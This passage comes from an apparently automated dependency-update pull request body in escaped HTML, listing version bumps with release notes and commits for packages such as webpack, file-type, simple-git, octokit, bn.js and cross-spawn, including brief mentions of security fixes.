href=\"https://redirect.github.com/webpack/webpack/issues/20238\"\u003e#20238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack/commit/b2b24590a08755b706d2009ca97a226addf9e83b\"\u003e\u003ccode\u003eb2b2459\u003c/code\u003e\u003c/a\u003e ci: cancel in progress (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20239\"\u003e#20239\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack/compare/v5.90.3...v5.104.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `file-type` from 21.0.0 to 21.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sindresorhus/file-type/releases\"\u003efile-type's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev21.3.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix ZIP bomb in known-size ZIP probing (GHSA-j47w-4g3g-c36v)  a155cd7\u003c/li\u003e\n\u003cli\u003eFix bound recursive BOM and ID3 detection  370ed91\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.3.1...v21.3.2\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.3.1...v21.3.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev21.3.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix infinite loop in ASF parser on malformed input (\u003ca href=\"https://github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473\"\u003ehttps://github.com/sindresorhus/file-type/security/advisories/GHSA-5v7r-6r5c-r473\u003c/a\u003e)  319abf8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.3.0...v21.3.1\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.3.0...v21.3.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev21.3.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Mach-O Universal (aka \u0026quot;Fat\u0026quot;) binaries and additional architectures (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/779\"\u003e#779\u003c/a\u003e)  d223491\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.2.0...v21.3.0\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.2.0...v21.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev21.2.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for SPSS data files (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/787\"\u003e#787\u003c/a\u003e)  889f638\u003c/li\u003e\n\u003cli\u003eAdd support for JMP (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/784\"\u003e#784\u003c/a\u003e)  093dba0\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.1.1...v21.2.0\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.1.1...v21.2.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev21.1.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix handling of partial Gunzip file (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/783\"\u003e#783\u003c/a\u003e)  710e053\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.1.0...v21.1.1\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.1.0...v21.1.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev21.1.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for \u003ccode\u003e.tar.gz\u003c/code\u003e (gunzipped tarball file) (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/763\"\u003e#763\u003c/a\u003e)  eda03a7\u003c/li\u003e\n\u003cli\u003eAdd support for Windows registry (.reg) files   0db61ec 7d2ddcf\u003c/li\u003e\n\u003cli\u003eAdd support for Windows registry hive file (\u003ccode\u003e.dat\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/767\"\u003e#767\u003c/a\u003e)  f8d62be\u003c/li\u003e\n\u003cli\u003eFix: Handle partial unzip (\u003ca href=\"https://redirect.github.com/sindresorhus/file-type/issues/773\"\u003e#773\u003c/a\u003e)  7ad3a90\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.0.0...v21.1.0\"\u003ehttps://github.com/sindresorhus/file-type/compare/v21.0.0...v21.1.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/e18028c3cc19441477c3459991fee9770d88c218\"\u003e\u003ccode\u003ee18028c\u003c/code\u003e\u003c/a\u003e 21.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/a155cd71323279de173c54e8c530d300d3854fdd\"\u003e\u003ccode\u003ea155cd7\u003c/code\u003e\u003c/a\u003e Fix ZIP bomb in known-size ZIP probing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/69548179cca2c0ab6a0cc93af59392f8c351cab1\"\u003e\u003ccode\u003e6954817\u003c/code\u003e\u003c/a\u003e Harden parser more\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/370ed9185d112eea4d989fecb843597b1d94cf09\"\u003e\u003ccode\u003e370ed91\u003c/code\u003e\u003c/a\u003e Fix bound recursive BOM and ID3 detection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/d2ecea187c47b944a9c001ae7637f02baed0825a\"\u003e\u003ccode\u003ed2ecea1\u003c/code\u003e\u003c/a\u003e Add a few more safeguards\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/41fcff5de64cfb53da6b2b9c048ebea8213f32c2\"\u003e\u003ccode\u003e41fcff5\u003c/code\u003e\u003c/a\u003e Update readme\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/a8f6934ddd93c3e12cc4ecb0cfc3e8d816d4b9fd\"\u003e\u003ccode\u003ea8f6934\u003c/code\u003e\u003c/a\u003e Fix CI\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/ad5857e5384874e853cc9c4c29b867f1135a7c30\"\u003e\u003ccode\u003ead5857e\u003c/code\u003e\u003c/a\u003e 21.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/5d2fedf104dc5067b51a1f31410aa60052c74f64\"\u003e\u003ccode\u003e5d2fedf\u003c/code\u003e\u003c/a\u003e Harden parser\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sindresorhus/file-type/commit/319abf871b50ba2fa221b4a7050059f1ae096f4f\"\u003e\u003ccode\u003e319abf8\u003c/code\u003e\u003c/a\u003e Fix infinite loop in ASF parser on malformed input\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sindresorhus/file-type/compare/v21.0.0...v21.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `simple-git` from 3.21.0 to 3.32.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/steveukx/git-js/releases\"\u003esimple-git's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003esimple-git@3.32.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ef704208: Enhanced \u003ccode\u003eprotocol.allow\u003c/code\u003e checks in \u003ccode\u003eallowUnsafeExtProtocol\u003c/code\u003e handling.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/CodeAnt-AI-Security\"\u003e\u003ccode\u003e@​CodeAnt-AI-Security\u003c/code\u003e\u003c/a\u003e for identifying the issue\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e8d02097: Enhanced clone unsafe switch detection.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e23b070f: Fix regex for detecting unsafe clone options\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/stevenwdv\"\u003e\u003ccode\u003e@​stevenwdv\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.32.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e1effd8e: Enhances the \u003ccode\u003eunsafe\u003c/code\u003e plugin to block additional cases where the \u003ccode\u003e-u\u003c/code\u003e switch may be disguised\nalong with other single character options.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/JuHwiSang\"\u003e\u003ccode\u003e@​JuHwiSang\u003c/code\u003e\u003c/a\u003e for identifying this as vulnerability.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.31.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea44184f: Resolve NPM publish steps\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.30.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ebc77774: Correctly identify current branch name when using \u003ccode\u003egit.status\u003c/code\u003e in a cloned empty repo.\u003c/p\u003e\n\u003cp\u003ePreviously \u003ccode\u003egit.status\u003c/code\u003e would report the current branch name as \u003ccode\u003eNo\u003c/code\u003e. Thank you to \u003ca href=\"https://github.com/MaddyGuthridge\"\u003e\u003ccode\u003e@​MaddyGuthridge\u003c/code\u003e\u003c/a\u003e for identifying this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.28.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2adf47d: Allow repeating git options like \u003ccode\u003e{'--opt': ['value1', 'value2']}\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esimple-git@3.27.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/steveukx/git-js/blob/main/simple-git/CHANGELOG.md\"\u003esimple-git's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.32.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ef704208: Enhanced \u003ccode\u003eprotocol.allow\u003c/code\u003e checks in \u003ccode\u003eallowUnsafeExtProtocol\u003c/code\u003e handling.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/CodeAnt-AI-Security\"\u003e\u003ccode\u003e@​CodeAnt-AI-Security\u003c/code\u003e\u003c/a\u003e for identifying the issue\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e8d02097: Enhanced clone unsafe switch detection.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e23b070f: Fix regex for detecting unsafe clone options\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/stevenwdv\"\u003e\u003ccode\u003e@​stevenwdv\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.32.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e1effd8e: Enhances the \u003ccode\u003eunsafe\u003c/code\u003e plugin to block additional cases where the \u003ccode\u003e-u\u003c/code\u003e switch may be disguised\nalong with other single character options.\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/JuHwiSang\"\u003e\u003ccode\u003e@​JuHwiSang\u003c/code\u003e\u003c/a\u003e for identifying this as vulnerability.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ed5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.31.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea44184f: Resolve NPM publish steps\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.31.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e22dc93f: Custom binary plugin should support the use of \u003ccode\u003e~\u003c/code\u003e character, used by Windows to shorten long folder names\nand folder names that have spaces in them (eg: \u003ccode\u003eC:\\Program Files\u003c/code\u003e might become \u003ccode\u003eC:\\PROGRA~1\u003c/code\u003e).\u003c/p\u003e\n\u003cp\u003eThanks to \u003ca href=\"https://github.com/skyshineb\"\u003e\u003ccode\u003e@​skyshineb\u003c/code\u003e\u003c/a\u003e for reporting this issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/a1170e506eeeaade4a242bfbf6d0620d57872364\"\u003e\u003ccode\u003ea1170e5\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/f7042088aa2dac59e3c49a84d7a2f4b26048a257\"\u003e\u003ccode\u003ef704208\u003c/code\u003e\u003c/a\u003e In extension to CVE-2022-25912, switch to case-insensitive check for `protoco...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/4bb20811eb35c0fa5437553cad4eb8ebf8f6f6e6\"\u003e\u003ccode\u003e4bb2081\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/7ae7537737bafc1e6559a28816785b10926fb095\"\u003e\u003ccode\u003e7ae7537\u003c/code\u003e\u003c/a\u003e Match tokens to word boundary\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/c47ad103b07ce768cf69aec63e0c9f7f77a1ab0f\"\u003e\u003ccode\u003ec47ad10\u003c/code\u003e\u003c/a\u003e Lint\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/8d02097b726c2bc5360b4f55ee3ecb7e09648e4d\"\u003e\u003ccode\u003e8d02097\u003c/code\u003e\u003c/a\u003e Enhanced clone switch detection\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/f6909a52807512cb4e29a654db2dcd409b019113\"\u003e\u003ccode\u003ef6909a5\u003c/code\u003e\u003c/a\u003e Remove test timeout override\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/77406267ceb19aa901495b6ae414020daf789ebf\"\u003e\u003ccode\u003e7740626\u003c/code\u003e\u003c/a\u003e Update plugin.unsafe.spec.ts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/b562a6c4c1a226d9c7789b72c76784f334c1efac\"\u003e\u003ccode\u003eb562a6c\u003c/code\u003e\u003c/a\u003e Version Packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/steveukx/git-js/commit/23b070f0a4d320af5e745a42ae6176a629409566\"\u003e\u003ccode\u003e23b070f\u003c/code\u003e\u003c/a\u003e Fix regex for CLONE_OPTIONS constant (\u003ca href=\"https://github.com/steveukx/git-js/tree/HEAD/simple-git/issues/1122\"\u003e#1122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/steveukx/git-js/commits/simple-git@3.32.3/simple-git\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for simple-git since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/endpoint` from 9.0.5 to 9.0.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/endpoint.js/releases\"\u003e\u003ccode\u003e@​octokit/endpoint\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003e9.0.6\u003c/a\u003e (2025-02-14)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e599ff4f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/endpoint.js/commit/599ff4f76534ea2872f40b41c4ffbbcca987d6a5\"\u003e\u003ccode\u003e599ff4f\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/endpoint.js/issues/515\"\u003e#515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/endpoint.js/compare/v9.0.5...v9.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 9.2.1 to 9.2.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev9.2.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003e9.2.2\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003ee1e4489\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/e1e44898cf1870f1496ae7f5b2a4476c71044e6b\"\u003e\u003ccode\u003ee1e4489\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/660\"\u003e#660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v9.2.1...v9.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 8.4.0 to 8.4.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.4.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003e8.4.1\u003c/a\u003e (2025-02-15)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e356411e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/356411e3217019aa9fc8a68f4236af82490873c2\"\u003e\u003ccode\u003e356411e\u003c/code\u003e\u003c/a\u003e fix: ReDos regex vulnerability, reported by \u003ca href=\"https://github.com/DayShift\"\u003e\u003ccode\u003e@​DayShift\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/octokit/request.js/compare/v8.4.0...v8.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `bn.js` from 4.12.0 to 4.12.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/39fe4389c773327ed15f29f77f8b7dbbff4beb4c\"\u003e\u003ccode\u003e39fe438\u003c/code\u003e\u003c/a\u003e 4.12.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/67ecb35dabaf252001b649c12d69c4b57deac6f6\"\u003e\u003ccode\u003e67ecb35\u003c/code\u003e\u003c/a\u003e backport(4.x): fix imaskn state (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/317\"\u003e#317\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/c4098bac2470418f8e0f6bf11fe0cb676a2b9047\"\u003e\u003ccode\u003ec4098ba\u003c/code\u003e\u003c/a\u003e 4.12.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/6277fd705e51edae1c404c65f03ba2e512706945\"\u003e\u003ccode\u003e6277fd7\u003c/code\u003e\u003c/a\u003e backport(4.x): Fix imuln/muln with zero (backport of \u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/313\"\u003e#313\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/314\"\u003e#314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/ac0d4afaae91701815b9edc19789e44e7690d688\"\u003e\u003ccode\u003eac0d4af\u003c/code\u003e\u003c/a\u003e 4.12.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/a5f14b43ec61bc7cafc6de2e7444913b9f581b00\"\u003e\u003ccode\u003ea5f14b4\u003c/code\u003e\u003c/a\u003e Fix serious issue in \u003ccode\u003e.toString(16)\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/309\"\u003e#309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/0cd2661b9d08512263c940662586042ef8aaccc6\"\u003e\u003ccode\u003e0cd2661\u003c/code\u003e\u003c/a\u003e Remove package-lock.json added by npm\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/indutny/bn.js/compare/v4.12.0...v4.12.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cross-spawn` from 6.0.5 to 6.0.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/blob/v6.0.6/CHANGELOG.md\"\u003ecross-spawn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v6.0.5...v6.0.6\"\u003e6.0.6\u003c/a\u003e (2024-11-18)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edisable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/ba5aaef\"\u003eba5aaef\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e support worker threads (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/127\"\u003e#127\u003c/a\u003e) (\u003ca 